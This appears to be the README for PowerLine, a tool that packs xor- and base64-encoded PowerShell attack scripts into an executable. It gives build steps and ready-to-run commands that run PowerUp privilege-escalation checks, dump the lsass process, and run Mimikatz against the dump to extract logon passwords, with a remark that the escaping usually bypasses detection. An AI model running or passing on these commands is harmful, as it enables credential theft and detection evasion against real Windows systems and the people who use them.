Download the Repo
Run the build.bat file
Update the UserConf.xml document to contain the URLs of the scripts that you'd like to include (examples shown)
Run the PLBuilder.exe file
The PowerLine.exe program should now be created and contains embedded, xor-encoded, base64-encoded versions of all of the scripts that you specified
//Shows scripts that are currently embedded in the program
//Run Invoke-AllChecks from the PowerUp script
PowerLine.exe PowerUp "Invoke-AllChecks"
//Get a dump of the lsass process. Must run as an admin
PowerLine.exe Out-Minidump "Get-Process lsass | Out-Minidump"
//Run mimikatz against the dump file created by the Out-Minidump command to extract creds. lsass_dump_name.dmp will be the name generated by Out-Minidump
//Yes, it's hellacious escaping but it works and usually bypasses detection =)
PowerLine.exe Invoke-Mimikatz "Invoke-Mimikatz -Command \"`\"sekurlsa::minidump lsass_dump_name.dmp`\" `\"sekurlsa::logonPasswords`\"\""